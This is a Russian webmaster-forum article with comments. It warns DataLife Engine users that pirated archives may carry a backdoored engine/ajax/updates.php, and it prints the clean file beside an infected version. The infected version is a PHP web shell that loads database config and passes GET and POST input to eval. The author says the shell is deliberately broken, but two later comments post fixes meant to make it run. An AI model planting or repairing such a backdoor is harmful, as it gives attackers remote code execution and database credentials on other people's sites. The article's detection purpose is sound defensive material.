prowebber.ru - Тут есть все для настоящих вебмастеров

Чтение RSS Мы в твиттере
«    Декабрь 2016    »
ПнВтСрЧтПтСбВс
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 

Всё для вебмастера » Всё для DataLife Engine » Как избежать шелла !

Как избежать шелла !


Данный материал предоставлен сайтом ProWebber.ru исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое.
У нас вы можете скачать бесплатно Как избежать шелла !.


Как избежать шелла !


Иногда, когда мы ставим движок DLE, у нас у файлах оказываются дыры. Всё это из-за пошлостей кого-то.
По этому я хочу что бы пользователи prowebber.ru чувствовали себя нормально, и всегда проверяли файлы.

Нашел я эту новость на одном сайте !

Если вы скачали архив Datalife Engine, проверьте файл engine/ajax/updates.php

Оригинал должен быть такой:
<?php
/*
=====================================================
DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
http://dle-news.ru/
-----------------------------------------------------
Copyright (c) 2004,2009 SoftNews Media Group
=====================================================
Данный код защищен авторскими правами
=====================================================
Файл: updates.php
-----------------------------------------------------
Назначение: Проверка на наличие новых версий
=====================================================
*/

@error_reporting(7);
@ini_set('display_errors', true);
@ini_set('html_errors', false);

define('DATALIFEENGINE', true);
define('ROOT_DIR', '../..');
define('ENGINE_DIR', '..');

include ENGINE_DIR.'/data/config.php';

if ($config['http_home_url'] == "") {

    $config['http_home_url'] = explode("engine/ajax/updates.php", $_SERVER['PHP_SELF']);
    $config['http_home_url'] = reset($config['http_home_url']);
    $config['http_home_url'] = "http://".$_SERVER['HTTP_HOST'].$config['http_home_url'];

}

require_once ENGINE_DIR.'/inc/include/functions.inc.php';


$selected_language = $config['langs'];

if (isset( $_COOKIE['selected_language'] )) {

    $_COOKIE['selected_language'] = totranslit( $_COOKIE['selected_language'], false, false );

    if (@is_dir ( ROOT_DIR . '/language/' . $_COOKIE['selected_language'] )) {
        $selected_language = $_COOKIE['selected_language'];
    }

}

require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';

$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];

@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);

$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);

if (!strlen($data)) echo $lang['no_update']; else echo $data;
?>


Пример шелла:
if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require(file); $x.="mysql.class.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require(file); $x.="dbconfig.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require(file); $x.="config.php - ok<br />";}
eval(base64_decode($_GET['user_id']));
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));
}}


+1
Просмотры: 13105 VIP ProWebber | Комментарии (16)
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

#1Bagner

  • 7 февраля 2010 00:31
  • Регистрация: 27.11.2009
  • ICQ: --
  • Комментариев: 308
Помог !? С Вас плюсик.

P.S. - Шеллом не думайте даже пользоваться. Скажу сразу, я кое что испортил в шелле, что бы он не работал !!!

--------------------

0

#2chak

  • 7 февраля 2010 00:41
  • Регистрация: 3.01.2010
  • ICQ: 8528342
  • Комментариев: 446
  • Выкл.
Ну, это я знал, но + поставлю снова:) Благое дело делаешь! Правда меня удивляет что ночью:) Но правильно! Нечего ставить на показ свои достоинства:)

Кстати, должен сказать, что ГК может встретиться не только в engine/ajax/updates.php. Почему именно в engine/ajax/updates.php кидают шелл? Ответ прост - сюда никто не залазит :DD Просто нету необходимости:)

0

#3Pheox

  • 7 февраля 2010 00:54
  • Регистрация: 13.07.2009
  • ICQ: --
  • Комментариев: 172
Проверил у себя вроде как бэ все нормально crazy

0

#4Qube

  • 7 февраля 2010 06:35
  • Регистрация: 22.12.2009
  • ICQ: 365490930
  • Комментариев: 119
Хорошо придумано, уменя кокрас была такая проблема.

0

#5kzpromo

  • 7 февраля 2010 07:16
  • Регистрация: 11.09.2009
  • ICQ: 6960380
  • Комментариев: 83
если подобный код нашли лучше сразу удалить весь движок))) эта не одна такая страница)))

--------------------

0

#6Alexander.S

  • 7 февраля 2010 08:08
  • Регистрация: 27.11.2009
  • ICQ: --
  • Комментариев: 120
Слава богу всё чисто

0

#7ТорЧок

  • 7 февраля 2010 08:15
  • Регистрация: 5.01.2010
  • ICQ: --
  • Комментариев: 247
crazy столетний баян от Злова. D

--------------------

0

#8softbibl

  • 7 февраля 2010 10:45
  • Регистрация: 7.02.2010
  • ICQ: --
  • Комментариев: 12
Проверил. Ничего нет

0

#9Dimon4ick

  • 8 февраля 2010 02:42
  • Регистрация: 31.01.2010
  • ICQ: 575445913
  • Комментариев: 79
Нормальок! Все чисто

0

#10Serega12689

  • 8 февраля 2010 03:42
  • Регистрация: 8.11.2009
  • ICQ: --
  • Комментариев: 40
А есть какие либо скрипты или программы для поиска шеллов?!

0

#11valeha

  • 8 февраля 2010 09:36
  • Регистрация: 9.11.2009
  • ICQ: 397937393
  • Комментариев: 126
спасибо, у меня тоже все чисто)

--------------------

0

#12alextrish

  • 10 февраля 2010 16:22
  • Регистрация: 12.12.2009
  • ICQ: --
  • Комментариев: 25
В скриптах не понимаю, а этот пример полезный!

--------------------

0

#13Joey

  • 30 марта 2011 22:13
  • Регистрация: 5.01.2010
  • ICQ: 963285
  • Комментариев: 266
@require(file)
исправить на
@require($file)

--------------------

0

#14beda2008

  • 5 июля 2012 03:22
  • Регистрация: 22.04.2010
  • ICQ: --
  • Комментариев: 23
Joey, и что? шел заработает??

0

#15mododrom

  • 15 февраля 2013 20:03
  • Регистрация: 14.02.2013
  • ICQ: --
  • Комментариев: 11
нормально))) спасибо, статья полезна+

0

#16Fen9

  • 23 октября 2013 13:26
  • Регистрация: 21.05.2010
  • ICQ: --
  • Комментариев: 31
  • Выкл.
beda2008,
Нет, он дал частичный ответ для того чтобы шелл работал, еще нужно поправить:

if (!strlen($data)) echo $lang['no_update']; else echo $data;
Заменить на:
if (!strlen($_data)) echo $_lang['noupdate']; else echo $_data;

0
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.

Max-energy.top - Заработок на электросчетчиках;)

Skripters.info - все для вебмастера. Только эксклюзивный контент.

Создание шаблонов DLE, быстро и недорого! 3wave.com.ua

Бро лей на лучшую партнёрку

Почти бесплатный VDS хостинг!

Кальян Khalil Mamoon Double Decker

Кальяны, табак, уголь и аксессуары. Кальяны, табак, уголь, аксессуары

кальяннадом.рф


планкен

uliv.com.ua


Создание сайтов рязань

База данных недвижимости Рязани и области. Продвижение сайтов

aurumastra.ru


Поддержи сайт
Скрипты, cms, шаблоны, статьи по раскрутке

Опросы

Как часто вы бываете на сайте?

Захожу 1-2 раза в день
1-2 часа в сутки
Более 2 часов
Почти целый день тут smile

Архив новостей
Ноябрь 2016 (7)
Октябрь 2016 (10)
Сентябрь 2016 (8)
Август 2016 (11)
Июль 2016 (14)
Июнь 2016 (17)

Последние комментарии:

Искать людей

Ваши переписки